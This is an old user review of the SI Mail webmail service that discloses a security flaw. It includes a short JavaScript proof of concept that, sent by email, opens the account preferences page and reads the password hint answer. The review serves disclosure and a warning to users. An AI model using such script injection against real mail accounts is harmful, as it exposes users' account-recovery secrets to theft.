Silicon implants
Written: May 25 '01
Pros: Free, easy to use
Cons: Too easy to crack
The Bottom Line: This email service sucks: you can embed JavaScript to extract user password details. Use your 'unsafe' password for your email if you want to avoid any problems.
SI Mail is reckless in the way it deals with embedded HTML and CGI calls from its email system. I signed up for SI Mail (battaliou@siliconinvestor.com) and sent myself the following JavaScript:
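    // Runs after the delay: reads the hint answer field from the opened page.
    function one() {
        alert(wo.document.forms.prefs.hintanswer.value);
        wo.close();
    }
    // Relative path to the account preferences form on the mail site.
    var s = '../../../../../../../../siliconinvestor/noframes/mailer/t_baseform.asp?whattodo=user&toolbar=y';
    wo = window.open(s, '');
    self.focus();
    setTimeout('one()', 5000);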
This had the effect of displaying my password hint answer. This is not good.
Seeing that their email service was provided by commtouch.com, I suppose Silicon Investor can't be held totally responsible for this oversight.
On a positive note, the service is very easy to use, and if you don't mind your email being open to the world, it would make a fine junk-mail account. Use this service at your own risk.
Recommended: No